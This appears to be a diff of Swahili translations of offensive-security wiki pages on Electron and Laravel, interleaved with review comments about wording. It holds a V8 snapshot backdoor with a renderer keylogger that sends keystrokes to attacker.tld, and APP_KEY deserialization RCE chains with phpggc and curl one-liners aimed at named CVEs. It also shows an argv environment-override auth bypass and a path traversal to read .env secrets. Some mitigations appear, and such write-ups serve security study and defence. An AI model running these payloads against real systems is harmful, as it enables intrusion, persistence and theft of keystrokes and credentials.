Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()
```
## systemPreferences module
API kuu kwa kufikia mipangilio ya mfumo na kutoa matukio ya mfumo katika Electron. Mbinu kama **subscribeNotification**, **subscribeWorkspaceNotification**, **getUserDefault**, na **setUserDefault** zote ni **sehemu ya** moduli hii.
Ni **API ya msingi** kwa kufikia mapendeleo ya mfumo na **kutuma matukio ya mfumo** katika Electron. Mbinu kama **subscribeNotification**, **subscribeWorkspaceNotification**, **getUserDefault**, na **setUserDefault** zote ni **sehemu ya** moduli hii.
**Mfano wa matumizi:**
```javascript
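Review bot: `Native` in the example (`Native.app.relaunch({...})`, `Native.app.exit()`) is never defined in this section; the only import shown is `import { dialog, getCurrentWindow } from '@electron/remote'`. Add one sentence stating that `Native` stands for the `@electron/remote` module object (or import `app` from it directly), otherwise the snippet cannot run as written. The bullet rewording in this hunk ("Inazindua upya" to "Inaanza upya", "Huweka" to "Hutangaza") changes nothing in meaning; "Hutangaza" (announces) is actually a worse fit for "sets" than the removed "Huweka".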
@ -367,31 +366,31 @@ console.log('Recent Places:', recentPlaces);
```
### **subscribeNotification / subscribeWorkspaceNotification**
* **Husikiliza** **arifa za asili za macOS** kwa kutumia NSDistributedNotificationCenter.
* Kabla ya **macOS Catalina**, ulikuwa unaweza sniff **arifa zote zilizosambazwa** kwa kutuma **nil** kwa CFNotificationCenterAddObserver.
* Baada ya **Catalina / Big Sur**, sandboxed apps bado zinaweza **subscribe** kwa **matukio mengi** (kwa mfano, **screen locks/unlocks**, **volume mounts**, **network activity**, n.k.) kwa kujiandikisha arifa **kwa jina**.
* **Inasikiliza** arifa za asili za **macOS** kwa kutumia NSDistributedNotificationCenter.
* Kabla ya **macOS Catalina**, uliweza sniff **all** distributed notifications kwa kupitisha **nil** kwa CFNotificationCenterAddObserver.
* Baada ya **Catalina / Big Sur**, apps zilizo kwenye sandbox bado zinaweza **subscribe** kwa **many events** (kwa mfano, **screen locks/unlocks**, **volume mounts**, **network activity**, n.k.) kwa kusajili notifications **by name**.
### **getUserDefault / setUserDefault**
* **Inashirikiana** na **NSUserDefaults**, ambayo huhifadhi mapendeleo ya **application** au **global** kwenye macOS.
* **Inashirikiana** na NSUserDefaults, ambayo huhifadhi mapendeleo ya programu au ya kimataifa kwenye macOS.
* **getUserDefault** inaweza **kutoa** taarifa nyeti, kama **eneo la faili za hivi karibuni** au **eneo la kijiografia la mtumiaji**.
* **getUserDefault** inaweza kupata taarifa nyeti, kama maeneo ya faili yaliyotumika hivi karibuni au eneo la kijiografia la mtumiaji.
* **setUserDefault** inaweza **kubadilisha** mapendeleo haya, na hivyo kuathiri **configuration** ya app.
* **setUserDefault** inaweza kubadilisha mapendeleo haya, ambayo yanaweza kuathiri usanidi wa app.
* Katika **matoleo ya zamani ya Electron** (kabla ya v8.3.0), tu **standard suite** ya NSUserDefaults ilikuwa inapatikana.
## Shell.showItemInFolder
Kazi hii inaonyesha faili iliyotolewa katika file manager, ambayo inaweza kutekeleza faili hiyo moja kwa moja.
Kazi hii inaonyesha faili iliyotolewa katika file manager, ambayo inaweza moja kwa moja kuendesha faili hiyo.
For more information check [https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html](https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html)
## Content Security Policy
Programu za Electron zinapaswa kuwa na **Content Security Policy (CSP)** ili **kuzuia XSS attacks**. **CSP** ni **standard ya usalama** inayosaidia **kuzuia** **utekelezaji** wa **untrusted code** katika browser.
Apps za Electron zinapaswa kuwa na **Content Security Policy (CSP)** ili **kuzuia XSS attacks**. **CSP** ni standard ya usalama inayosaidia **kuzuia** utekelezaji wa **untrusted code** kwenye browser.
Kwa kawaida hupangwa katika faili ya **main.js** au katika kiolezo cha **index.html** na CSP ndani ya meta tag.
Kwa kawaida imewekwa katika faili ya **`main.js`** au kwenye template ya **`index.html`** kwa kuweka CSP ndani ya **meta tag**.
For more information check:
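Review bot: the heading `## Shell.showItemInFolder` capitalises the module; the Electron API is `shell.showItemInFolder(fullPath)` with a lowercase `shell`, so readers searching an app's code for the heading text will not find it. "For more information check" appears twice in this hunk and is left in English while the neighbouring lines are translated; "Kwa taarifa zaidi angalia" finishes the job. The NSUserDefaults bullets are only reworded (bold removed, "kutoa" to "kupata") with no change in content, so the replacement of those three lines is churn.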
@ -401,16 +400,16 @@ pentesting-web/content-security-policy-csp-bypass/
{{#endref}}
## **Tools**
## **Vifaa**
- [**Electronegativity**](https://github.com/doyensec/electronegativity) ni zana ya kubaini misconfigurations na security anti-patterns katika applications zinazotegemea Electron.
- [**Electrolint**](https://github.com/ksdmitrieva/electrolint) ni plugin ya VS Code open source kwa applications za Electron inayotumia Electronegativity.
- [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) kwa kuangalia third-party libraries zilizo vulnerable
- [**Electronegativity**](https://github.com/doyensec/electronegativity) ni chombo cha kubaini misconfigurations na security anti-patterns katika Electron-based applications.
- [**Electrolint**](https://github.com/ksdmitrieva/electrolint) ni plugin ya VS Code ya open source kwa Electron applications inayotumia Electronegativity.
- [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) kwa kuangalia third party libraries zenye udhaifu
- [**Electro.ng**](https://electro.ng/): Unahitaji kununua
## Maabara
In [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s) unaweza kupata maabara ili exploit vulnerable Electron apps.
Katika [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s) unaweza kupata maabara ya kutumia exploit dhidi ya vulnerable Electron apps.
Baadhi ya amri zitakazokusaidia katika maabara:
```bash
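Review bot: "Vifaa" (equipment, devices) for the "Tools" heading clashes with "zana"/"chombo" used for the same word in the bullets directly beneath it; "Zana" is the term the page already uses, so keep it in the heading. The rewritten tool bullets swap "zana" for "chombo" and "open source" for "ya open source" without changing meaning, and the lab sentence still opens with the English "In" in the removed line and "Katika" in the added one; the added version is the right one, but "maabara ya kutumia exploit dhidi ya" can simply be "maabara ya kushambulia".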
@ -437,18 +436,18 @@ npm start
```
## Local backdooring via V8 heap snapshot tampering (Electron/Chromium) CVE-2025-55305
Apps za Electron na zinazotegemea Chromium deserialize a prebuilt V8 heap snapshot at startup (v8_context_snapshot.bin, and optionally browser_v8_context_snapshot.bin) to initialize each V8 isolate (main, preload, renderer). Kihistoria, Electrons integrity fuses did not treat these snapshots as executable content, so they escaped both fuse-based integrity enforcement and OS code-signing checks. Kwa matokeo, kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kulitoa utekelezaji wa code wa kisiri, wa kudumu ndani ya app bila kuharibu the signed binaries au ASAR.
Apps za Electron na zile zinazotegemea Chromium hudeserialize prebuilt V8 heap snapshot wakati wa startup (v8_context_snapshot.bin, na hiari browser_v8_context_snapshot.bin) ili kuanzisha kila V8 isolate (main, preload, renderer). Kihistoria, Electrons integrity fuses hazikutofautisha snapshots hizi kama executable content, hivyo zilitoka kwenye enforcement ya integrity ya fuse na checks za OS code-signing. Kwa hivyo, kubadilisha snapshot kwenye usakinishaji unaoweza kuandikwa na mtumiaji kuliwezesha utekelezaji wa code kwa utendakazi wa siri na wa kudumu ndani ya app bila kuharibu binaries zilizotiwa saini au ASAR.
Key points
- Integrity gap: EnableEmbeddedAsarIntegrityValidation and OnlyLoadAppFromAsar validate app JavaScript inside the ASAR, but they did not cover V8 heap snapshots (CVE-2025-55305). Chromium similarly does not integrity-check snapshots.
- Attack preconditions: Local file write into the apps installation directory. Hii ni kawaida kwenye systems ambapo Electron apps au Chromium browsers zimewekwa under user-writable paths (e.g., %AppData%\Local on Windows; /Applications with caveats on macOS).
- Effect: Reliable execution of attacker JavaScript in any isolate by clobbering a frequently used builtin (a “gadget”), enabling persistence and evasion of code-signing verification.
- Affected surface: Electron apps (even with fuses enabled) and Chromium-based browsers that load snapshots from user-writable locations.
- Integrity gap: EnableEmbeddedAsarIntegrityValidation na OnlyLoadAppFromAsar zinathibitisha JavaScript ya app ndani ya ASAR, lakini hazikucover V8 heap snapshots (CVE-2025-55305). Chromium kwa namna ile ile haifanyi integrity-check kwa snapshots.
- Attack preconditions: Uandishi wa faili kwa eneo la usakinishaji la app na mtumiaji. Hii ni ya kawaida kwenye mifumo ambapo apps za Electron au browsers za Chromium zimesakinishwa kwenye paths zinazoweza kuandikwa na mtumiaji (mfano: %AppData%\Local kwenye Windows; /Applications kwa caveats kwenye macOS).
- Effect: Utekelezaji wa kuaminika wa attacker JavaScript katika isolate yoyote kwa kuandika juu builtin inayotumika mara kwa mara (gadget), kuruhusu persistence na kuepuka verification ya code-signing.
- Affected surface: Electron apps (hata zikiwa na fuses zimewezeshwa) na browsers za msingi wa Chromium zinazolisoma snapshots kutoka locations zinazoweza kuandikwa na mtumiaji.
Generating a malicious snapshot without building Chromium
- Use the prebuilt electron/mksnapshot to compile a payload JS into a snapshot and overwrite the applications v8_context_snapshot.bin.
- Tumia prebuilt electron/mksnapshot ili kukompaila payload JS ndani ya snapshot na kuoverwrite v8_context_snapshot.bin ya application.
Example wa payload ndogo (thibitisha uteklezaji kwa kulazimisha crash)
Example minimal payload (prove execution by forcing a crash)
```js
// Build snapshot from this payload
// npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
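Review bot: "uteklezaji" in "thibitisha uteklezaji kwa kulazimisha crash" is a typo for "utekelezaji", and "Example wa payload ndogo" keeps the English "Example" where "Mfano" is used everywhere else on the page. The section is left half translated: "Key points" and "Generating a malicious snapshot without building Chromium" remain English between translated bullets ("Mambo muhimu" and "Kutengeneza snapshot hasidi bila kujenga Chromium" would complete it). "Electrons integrity fuses" in both the removed and added intro has lost its apostrophe ("Electron's").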
@ -462,11 +461,11 @@ Array.isArray = function () {
throw new Error("testing isArray gadget");
};
```
Isolate-aware payload routing (run different code in main vs. renderer)
- Utambuzi wa main process: Node-only globals kama process.pid, process.binding(), au process.dlopen zipo katika main process isolate.
- Utambuzi wa browser/renderer: Browser-only globals kama alert zinapatikana wakati zikiendeshwa katika muktadha wa dokumenti.
Isolate-aware payload routing (endesha code tofauti katika main vs. renderer)
- Uchunguzi wa mchakato mkuu: Globali za Node pekee kama process.pid, process.binding(), au process.dlopen zipo katika isolate ya mchakato mkuu.
- Uchunguzi wa browser/renderer: Globali za browser pekee kama alert zinapatikana wakati zinapoendeshwa katika muktadha wa document.
Mfano wa gadget inayochunguza uwezo wa Node wa main-process mara moja
Mfano wa gadget unaochunguza uwezo wa Node wa mchakato mkuu mara moja
```js
const orig = Array.isArray;
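Review bot: "Globali" in "Globali za Node pekee" and "Globali za browser pekee" is not a Swahili word; the removed lines kept "globals" as a technical term, which is the better choice (or "vigezo vya global"). "Utambuzi" (detection) in the removed lines is also closer to the intended sense than "Uchunguzi" (investigation) in the added ones, so the rewrite of these two bullets is a step backwards.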
@ -495,7 +494,7 @@ process.exit(0);
return orig(...arguments);
};
```
Renderer/browser-context data theft PoC (kwa mfano Slack)
Renderer/browser-context wizi wa data PoC (kwa mfano, Slack)
```js
const orig = Array.isArray;
Array.isArray = function() {
@ -519,24 +518,24 @@ fetch('http://attacker.tld/keylogger?q=' + encodeURIComponent(e.key), {mode: 'no
return orig(...arguments);
};
```
Mtiririko wa operator
1) Andika payload.js inayobadilisha builtin ya kawaida (mfano, Array.isArray) na hiari itumie matawi kwa kila isolate.
Mtiririko wa mwendeshaji
1) Andika payload.js ambayo inaharamisha builtin ya kawaida (mfano, Array.isArray) na, hiari, igawie matawi kwa kila isolate.
2) Jenga snapshot bila vyanzo vya Chromium:
- npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
3) Funika faili za snapshot za programu lengwa:
- v8_context_snapshot.bin (always used)
- browser_v8_context_snapshot.bin (if the LoadBrowserProcessSpecificV8Snapshot fuse is used)
4) Anzisha programu; gadget itatekelezwa kila wakati builtin iliyochaguliwa inapoitwa.
3) Andika juu ya faili(ti) za snapshot za programu lengwa:
- v8_context_snapshot.bin (inayotumika kila wakati)
- browser_v8_context_snapshot.bin (ikiwa fuse ya LoadBrowserProcessSpecificV8Snapshot inatumiwa)
4) Anzisha programu; gadget itatekelezwa kila wakati builtin iliyochaguliwa inapotumika.
Vidokezo na mambo ya kuzingatia
- Integrity/signature bypass: Snapshot files are not treated as native executables by code-signing checks and (historically) were not covered by Electrons fuses or Chromium integrity controls.
- Uendelevu: Kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kwa kawaida hufanikiwa kuhimili anzisho upya za app na inaonekana kama app iliyotiwa saini na halali.
- Chromium browsers: The same tampering concept applies to Chrome/derivatives installed in user-writable locations. Chrome has other integrity mitigations but explicitly excludes physically local attacks from its threat model.
- Kupitisha uadilifu/sahihi ya saini: Faili za snapshot hazichukuliwi kama native executables na ukaguzi wa code-signing na (kihistoria) hazikutumika chini ya fuses za Electron au udhibiti wa uadilifu wa Chromium.
- Uendelevu: Kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kawaida hudumu baada ya kuanzishwa upya kwa app na huonekana kama app iliyosainiwa, halali.
- Chromium browsers: Dhana ile ile ya kuharibu inatumika kwa Chrome/derivatives zilizowekwa katika maeneo yanayoweza kuandikwa na mtumiaji. Chrome ina hatua nyingine za ulinzi wa uadilifu lakini kwa uwazi inatoa kuwa mashambulizi ya kimwili yaliyopo mahali hayajumuishwi katika mfano wake wa tishio.
Ugundaji na hatua za kupunguza
- Treat snapshots as executable content and include them in integrity enforcement (CVE-2025-55305 fix).
- Prefer admin-writable-only install locations; baseline and monitor hashes for v8_context_snapshot.bin and browser_v8_context_snapshot.bin.
- Detect early-runtime builtin clobbering and unexpected snapshot changes; alert when deserialized snapshots do not match expected values.
Ugunduzi na hatua za kupunguza
- Tibu snapshots kama maudhui yanayoweza kutekelezwa na uzijumlishe kwenye utekelezaji wa uadilifu (CVE-2025-55305 fix).
- Pendelea maeneo ya usakinishaji yanayoweza kuandikwa tu na admin; tengeneza mstari wa msingi na fuatilia hashes za v8_context_snapshot.bin na browser_v8_context_snapshot.bin.
- Gundua ufisadi wa builtin kwa wakati wa awali wa runtime na mabadiliko yasiyotarajiwa ya snapshot; toa tahadhari wakati snapshots zilizodeserialishwa hazilingani na thamani zilizotarajiwa.
## **Marejeo**
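Review bot: "inaharamisha" in "payload.js ambayo inaharamisha builtin ya kawaida" means "declares forbidden", not "clobbers"; the removed line's "inabadilisha" (replaces) or "inaandika juu ya" (overwrites, used two bullets later) is the intended sense. The same applies to "ufisadi wa builtin" in the detection bullet, where "ufisadi" is corruption in the political sense; "uandishi juu ya builtin" matches the English. "mashambulizi ya kimwili yaliyopo mahali" for "physically local attacks" is garbled; "mashambulizi ya ndani ya mashine (local)" reads cleanly. "Mtiririko wa mwendeshaji" for "operator flow" is fine, but "igawie matawi kwa kila isolate" is unclear; "iwe na tawi tofauti kwa kila isolate" says what the payload does.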


@ -8,10 +8,10 @@ Soma taarifa kuhusu hili hapa: [https://stitcher.io/blog/unsafe-sql-functions-in
---
## APP_KEY & Undani za Encryption (Laravel \u003e=5.6)
## APP_KEY & Encryption internals (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) pamoja na HMAC kwa integriti chini ya kifuniko (`Illuminate\\Encryption\\Encrypter`).
Ciphertext mbichi ambayo hatimaye **hutumwa kwa client** ni **Base64 ya JSON object** kama:
Laravel inatumia AES-256-CBC (au GCM) pamoja na uadilifu wa HMAC chini ya kifuniko (`Illuminate\\Encryption\\Encrypter`).
Ciphertext ghafi ambayo hatimaye **sent to the client** ni **Base64 of a JSON object** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
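Review bot: the heading reads `Laravel \u003e=5.6` in both the removed and added line; `\u003e` is a JSON-escaped `>`, so the heading should be `Laravel >=5.6`. In the same hunk `Illuminate\\Encryption\\Encrypter` inside backticks renders the doubled backslashes literally (inline code is not escape-processed); the class is `Illuminate\Encryption\Encrypter`. "sent to the client" and "Base64 of a JSON object" were Swahili in the removed line ("hutumwa kwa client", "Base64 ya JSON object") and come back as English in the added one, which is a regression.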
@ -20,7 +20,9 @@ Ciphertext mbichi ambayo hatimaye **hutumwa kwa client** ni **Base64 ya JSON obj
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` itafanya `serialize()` ya plaintext kwa default, wakati `decrypt($payload, $unserialize=true)` **ita `unserialize()` moja kwa moja** thamani iliyofichuliwa. Kwa hiyo **attacker yeyote anayejua siri ya 32-byte `APP_KEY` anaweza kutengeneza encrypted PHP serialized object na kupata RCE kupitia magic methods (`__wakeup`, `__destruct`, …)**.
`encrypt($value, $serialize=true)` itafanya `serialize()` ya plaintext kwa chaguo-msingi, wakati
`decrypt($payload, $unserialize=true)` **ita `unserialize()` moja kwa moja** ya thamani iliyofumbuliwa.
Hivyo **mtuhumiwa yeyote anayejua siri ya 32-byte `APP_KEY` anaweza kutengeneza objekti ya PHP iliyoserialishwa na iliyosimbwa na kupata RCE kupitia magic methods (`__wakeup`, `__destruct`, …)**.
Minimal PoC (framework ≥9.x):
```php
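Review bot: "mtuhumiwa yeyote" means "any suspect"; the removed line's "attacker" (Swahili "mshambuliaji") is the intended word, since the sentence is about who can forge the payload. "objekti ya PHP iliyoserialishwa na iliyosimbwa" should keep "object" as a technical term, as the rest of the page does. Splitting the paragraph into three lines is fine, but "Minimal PoC (framework ≥9.x):" stays in English.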
@ -29,12 +31,12 @@ use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Weka string iliyotengenezwa kwenye sink yoyote yenye udhaifu ya `decrypt()` (route param, cookie, session, …).
Injiza msururu uliotengenezwa ndani ya sink yoyote dhaifu ya `decrypt()` (route param, cookie, session, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) huotomatisha mchakato mzima na inaongeza hali inayofaa ya **bruteforce**:
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inaendesha mchakato mzima kiotomatiki na inaongeza njia rahisi ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
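Review bot: the key argument is shown in two forms in this hunk, `-k "base64:<APP_KEY>"` for encrypt and `-k <APP_KEY>` for decrypt, without saying whether the `base64:` prefix (the form Laravel's `.env` uses) is required, optional, or stripped by the tool; one comment line stating which form `laravel_crypto_killer.py` accepts would remove the ambiguity. "The script inasaidia" in the added sentence mixes an English article into Swahili; the removed "Scripti inasaidia" was correct.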
@ -45,25 +47,25 @@ laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
Scripti inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
The script inasaidia kwa uwazi payloads za CBC na GCM na inaunda tena sehemu ya HMAC/tag.
---
## Real-world vulnerable patterns
## Mifano ya udhaifu ya dunia halisi
| Mradi | Sink dhaifu | Gadget chain |
|-------|-------------|--------------|
| Project | Sinki yenye udhaifu | Gadget chain |
|---------|---------------------|--------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyonyaji ni daima:
1. Pata au jaribu kwa brute-force `APP_KEY` ya byte 32.
2. Jenga gadget chain na **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`).
3. Encrypt serialized gadget kwa **laravel_crypto_killer.py** na `APP_KEY` iliyopatikana.
4. Wasilisha ciphertext kwa sink dhaifu ya `decrypt()` (route parameter, cookie, session …) ili kusababisha **RCE**.
The exploitation workflow is always:
1. Pata au brute-force the 32-byte `APP_KEY`.
2. Jenga gadget chain with **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`).
3. Encrypt gadget iliyoserialiwa na **laravel_crypto_killer.py** na `APP_KEY` uliopatikana.
4. Tuma ciphertext kwa sinki yenye udhaifu `decrypt()` (route parameter, cookie, session …) ili kusababisha **RCE**.
Hapo chini kuna mistari fupi (one-liners) inayoonyesha njia kamili ya shambulio kwa kila CVE ya ulimwengu halisi iliyo tajwa hapo juu:
Hapo chini kuna mifano fupi za mstari mmoja (one-liners) zinazoonyesha njia kamili ya shambulio kwa kila CVE ya dunia halisi iliyotajwa hapo juu:
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
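Review bot: the table cells `/route/{hash}``decrypt($hash)` and `SESSION_DRIVER=cookie``laravel_session` have lost the arrow that separated the two code spans, and adjacent backticks merge into one malformed span in markdown; restore `→` between them (``/route/{hash}` → `decrypt($hash)``). The rewritten workflow regresses to English fragments ("The exploitation workflow is always", "brute-force the 32-byte", "Jenga gadget chain with **PHPGGC**") where the removed lines were fully Swahili; keep the removed wording. The table header row is rewritten only to change column widths and "Sink dhaifu" to "Sinki yenye udhaifu", which is churn.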
@ -80,38 +82,38 @@ php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
## Ugundaji mkubwa wa APP_KEY via cookie brute-force
## Ugunduzi wa APP_KEY kwa wingi kupitia cookie brute-force
Kwa sababu kila majibu mapya ya Laravel huweka angalau cookie iliyofichwa (`XSRF-TOKEN` na kawaida `laravel_session`), **public internet scanners (Shodan, Censys, …) leak mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa offline.
Kwa sababu kila response mpya ya Laravel inaweka angalau cookie iliyofichwa (`XSRF-TOKEN` na kawaida `laravel_session`), **public internet scanners (Shodan, Censys, …) leak mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa offline.
Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):
* Dataset Julai 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % keys cracked**
* >1 000 servers bado vulnerable to legacy CVE-2018-15133 kwa sababu tokens directly contain serialized data.
* Huge key reuse the Top-10 APP_KEYs ni hard-coded defaults zilizoshipwa na commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked**
* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.
* Utiririshaji mkubwa wa keys the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
Chombo binafsi cha Go **nounours** kinaboresha AES-CBC/GCM bruteforce throughput hadi ~1.5 billion tries/s, kukata muda wa full dataset cracking chini ya <2 minutes.
The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
## CVE-2024-52301 HTTP argv/env override → auth bypass
Wakati PHPs `register_argc_argv=On` (kawaida kwenye distros nyingi), PHP inaonyesha array `argv` kwa HTTP requests inayotokana na query string. Matoleo ya hivi karibuni ya Laravel yalichambua hizi “CLI-like” args na kuzingatia `--env=<value>` wakati wa runtime. Hii inaruhusu kubadilisha environment ya framework kwa HTTP request ya sasa kwa kuiongeza tu kwenye URL yoyote:
When PHPs `register_argc_argv=On` (typical on many distros), PHP exposes an `argv` array for HTTP requests derived from the query string. Recent Laravel versions parsed these “CLI-like” args and honored `--env=<value>` at runtime. This allows flipping the framework environment for the current HTTP request just by appending it to any URL:
- Quick check:
- Tembelea `https://target/?--env=local` au kamba yoyote na tazama mabadiliko yanayotegemea environment (debug banners, footers, verbose errors). Ikiwa kamba inaonekana reflected, override inafanya kazi.
- Visit `https://target/?--env=local` or any string and look for environment-dependent changes (debug banners, footers, verbose errors). If the string is reflected, the override is working.
- Impact example (business logic trusting a special env):
- Ikiwa app ina matawi kama `if (app()->environment('preprod')) { /* bypass auth */ }`, unaweza kuthibitisha bila creds sahihi kwa kutuma login POST kwa:
- If the app contains branches like `if (app()->environment('preprod')) { /* bypass auth */ }`, you can authenticate without valid creds by sending the login POST to:
- `POST /login?--env=preprod`
- Notes:
- Inaenda kwa kila-request, hakuna persistence.
- Inahitaji `register_argc_argv=On` na vulnerable Laravel version inayosoma argv kwa HTTP.
- Primitive muhimu kuonyesha errors zaidi katika “debug” envs au kuamsha code paths zilizo gatwa na environment.
- Works per-request, no persistence.
- Requires `register_argc_argv=On` and a vulnerable Laravel version that reads argv for HTTP.
- Useful primitive to surface more verbose errors in “debug” envs or to trigger environment-gated code paths.
- Mitigations:
- Zima `register_argc_argv` kwa PHP-FPM/Apache.
- Update Laravel ili isibris argv kwenye HTTP requests na ondoa assumptions za trust zinazohusiana na `app()->environment()` katika production routes.
- Disable `register_argc_argv` for PHP-FPM/Apache.
- Upgrade Laravel to ignore argv on HTTP requests and remove any trust assumptions tied to `app()->environment()` in production routes.
Minimal exploitation flow (Burp):
```http
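Review bot: this hunk replaces an almost fully Swahili CVE-2024-52301 section with English ("When PHPs `register_argc_argv=On`", "Visit `https://target/?--env=local`", "Works per-request, no persistence", "Disable `register_argc_argv`", "Upgrade Laravel to ignore argv"), and does the same for the nounours and dataset bullets; a translation commit should not revert translated lines, so the removed lines should be restored (with the typo "isibris" fixed to "isipuuze"). In the key-reuse bullet "Utiririshaji mkubwa wa keys" means "huge streaming of keys"; "Utumiaji tena mkubwa wa keys" is the meaning of "Huge key reuse", and the separator after it ("Huge key reuse the Top-10") has been lost in both versions. "PHPs" is missing its apostrophe ("PHP's").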
@ -127,22 +129,22 @@ email=a@b.c&password=whatever&remember=0xdf
### Hali ya debugging
Ikiwa Laravel iko katika **debugging mode** utaweza kupata **code** na **sensitive data**.\
Iwapo Laravel iko katika **debugging mode**, utaweza kupata **code** na **sensitive data**.\
Kwa mfano `http://127.0.0.1:8000/profiles`:
![](<../../images/image (1046).png>)
Hali hii kawaida inahitajika kwa ku-exploit CVE nyingine za Laravel RCE.
Hii kwa kawaida inahitajika kwa kutumia exploits dhidi ya CVEs nyingine za Laravel RCE.
### Fingerprinting & exposed dev endpoints
### Fingerprinting & endpoints za dev zilizo wazi
Ukaguzi mfupi wa haraka kutambua stack ya Laravel na zana hatari za dev zilizo wazi katika production:
Mikaguzi ya haraka kutambua stack ya Laravel na dev tooling hatari zilizo wazi katika production:
- `/_ignition/health-check` → Ignition present (debug tool used by CVE-2021-3129). Ikiwa inafikika bila uthibitishaji, app inaweza kuwa katika debug au imepangwa vibaya.
- `/_debugbar` → Laravel Debugbar assets; mara nyingi inaashiria debug mode.
- `/telescope` → Laravel Telescope (dev monitor). Ikiwa ni public, tarajia ufichaji mkubwa wa taarifa na vitendo vinavyowezekana.
- `/horizon` → Queue dashboard; version disclosure na wakati mwingine vitendo vilivyolindwa na CSRF.
- `X-Powered-By`, cookies `XSRF-TOKEN` and `laravel_session`, and Blade error pages pia husaidia kutambulisha.
- `/_ignition/health-check` → Ignition ipo (debug tool used by CVE-2021-3129). Ikiwa inafikiwa bila uthibitisho, app inaweza kuwa katika debug mode au imepangwa vibaya.
- `/_debugbar` → Laravel Debugbar assets; mara nyingi zinaonyesha debug mode.
- `/telescope` → Laravel Telescope (dev monitor). Ikiwa ni ya umma, tarajia kufichuka kwa taarifa nyingi na vitendo vinavyowezekana.
- `/horizon` → Queue dashboard; inaweza kufichua version na wakati mwingine vitendo vinavyolindwa na CSRF.
- Header `X-Powered-By`, cookies `XSRF-TOKEN` na `laravel_session`, pamoja na kurasa za makosa za Blade pia husaidia kutambua.
```bash
# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
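Review bot: the fingerprinting bullets list `/_ignition/health-check`, `/_debugbar`, `/telescope` and `/horizon` as exposed dev tooling but this hunk gives no corresponding hardening line, unlike the argv section above; add a sentence that these endpoints should be disabled in production or restricted to authenticated roles, so the section is a defender's checklist and not only an exposure list.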
@ -151,11 +153,11 @@ for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https:/
```
### .env
Laravel huhifadhi APP inayotumiwa ku-encrypt cookies na taarifa nyingine za uthibitisho ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia path traversal chini ya: `/../.env`
Laravel huhifadhi APP inayotumiwa ku-encrypt cookies na sifa nyingine ndani ya faili iitwayo `.env` inayoweza kupatikana kwa kutumia path traversal chini ya: `/../.env`
Laravel pia itaonyesha taarifa hii ndani ya ukurasa wa debug (unaoonekana wakati Laravel inapata kosa na debug imewezeshwa).
Laravel pia itaonyesha taarifa hii ndani ya debug page (inayoonekana wakati Laravel inapopata kosa na ikiwa imewezeshwa).
Kwa kutumia APP_KEY ya siri ya Laravel unaweza decrypt na re-encrypt cookies:
Kwa kutumia siri ya APP_KEY ya Laravel unaweza decrypt na re-encrypt cookies:
### Decrypt Cookie
```python
